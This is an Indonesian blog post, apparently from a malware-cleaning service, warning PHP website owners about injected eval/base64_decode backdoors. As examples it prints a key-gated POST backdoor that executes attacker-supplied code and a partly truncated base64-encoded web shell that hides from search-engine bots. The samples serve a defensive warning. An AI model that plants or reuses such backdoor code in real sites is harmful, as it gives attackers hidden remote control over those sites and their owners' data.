Keamanan Sistem

Hati-hati dengan kode eval dan base64_decode!!!

Bagi anda yang menemukan kode aneh yang sebelumnya tidak ada di skrip website anda sebaiknya berhati-hati. Umumnya kode-kode tersebut disisipkan dalam file web tanpa sepengetahuan pemilik website. Kode tersebut dapat dimanfaatkan oleh orang yang ingin melakukan upload file hacking, malware, virus dsb.

Berikut adalah kode yang kami temukan pada beberapa klien yang menggunakan skrip PHP sebagai basis skrip website mereka.

Perhatikan bahwa banyak kode yang di enkripsi dan di enkode mengunakan fungsi umum PHP yang sebenarnya merupakan fungsi penting untuk mengamankan skrip dalam suatu website.

Fungsi eval dan base64_decode><base64_encode adalah fungsi-fungsi yang dapat digunakan untuk mengamankan skrip PHP agar tidak dapat dilihat dengan mudah oleh orang pada umumnya. Hal ini dimanfaatkan juga oleh para hacker/phreaker/lamer dan para programmer yang mencoba membuat suatu program jahat dengan selubung themes/templates gratis umumnya untuk desain website wordpress dari hasil hacking.

Untuk keamanan, silahkan membeli desain yang terpercaya keamanannya dan selalu up-to-date. Pastikan anda mendapatkan jaminan perbaikan desain jika ditemukan lubang keamanan kedepannya.

Berikut adalah beberapa kode yang kami temukan dari hasil scanning beberapa website yang menggunakan desain (themes/templates) dan plugins/extensions/modules yang tidak aman yang mereka gunakan dalam CMS mereka.

1. Kode eval(base64_decode( dengan $_POST yang bisa digunakan orang tidak bertanggung jawab untuk mengirimkan kode dengan metode POST.

if($_POST["key"]=="3ecf1b1182bf60df5de559ed7a60fe9c")
eval(base64_decode($_POST["code"]));die();}

 

2. Skrip yang telah di enkode dengan fungsi base64.

eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NDI0YmZhMTJkMWYyYWQzMjQ2
M2FjMWE4MGU0MDciOyAjIHRlc3QKJGNvbG9yID0gIiNkZjUiOwokZGVmYXVsdF9hY3
Rpb24gPSAnRmlsZXNNYW4nOwokZGVmYXVsdF91c2VfYWpheCA9IHRydWU7CiRkZWZh
dWx0X2NoYXJzZXQgPSAnV2luZG93cy0xMjUxJzsKCmlmKCFlbXB0eSgkX1NFUlZFUl
snSFRUUF9VU0VSX0FHRU5UJ10pKSB7CiAgICAkdXNlckFnZW50cyA9IGFycmF5KCJH
b29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleC
IsICJSYW1ibGVyIik7CiAgICBpZihwcmVnX21hdGNoKCcvJyAuIGltcGxvZGUoJ3wn
LCAkdXNlckFnZW50cykgLiAnL2knLCAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ1
0pKSB7CiAgICAgICAgaGVhZGVyKCdIVFRQLzEuMCA0MDQgTm90IEZvdW5kJyk7CiAg
ICAgICAgZXhpdDsKICAgIH0KfQoKQGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7Ck
Bpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsKQGluaV9zZXQoJ21heF9leGVjdXRpb25f
dGltZScsMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKQHNldF9tYWdpY19xdW90ZXNfcn
VudGltZSg
.... .... .... .... ....
.... .... .... .... ....
.... .... .... .... ....
bHRfYWN0aW9uKSkKCQkkX1BPU1RbJ2EnXSA9ICRkZWZhdWx0X2FjdGlvbjsKCWVsc2
UKCQkkX1BPU1RbJ2EnXSA9ICdTZWNJbmZvJzsKaWYoICFlbXB0eSgkX1BPU1RbJ2En
XSkgJiYgZnVuY3Rpb25fZXhpc3RzKCdhY3Rpb24nIC4gJF9QT1NUWydhJ10pICkKCW
NhbGxfdXNlcl9mdW5jKCdhY3Rpb24nIC4gJF9QT1NUWydhJ10pOwpleGl0Owo="));

Dan masih banyak lagi kode lainnya yang belum ditemukan, berikutnya akan diupdate kembali artikel yang berhubungan dengan malware dan kode hacking/deface berbahaya demi keamanan sistem, khususnya website.

Perhatikan bahwa anda harus melakukan pemeriksaan update CMS anda minimal setiap 1 bulan 1x.

Website anda sedang sakit dan telah terinfeksi malware atau bahkan sekarat? Hubungi kami untuk jasa pembersihan malware sekarang juga sebelum website anda bertambah parah. Keterlambatan deteksi malware dapat menyebabkan Blacklist Domain oleh Google dan browser serta anti virus komputer yang menyebabkan anda kehilangan pengunjung secara drastis.

Terimakasih.

Post Comment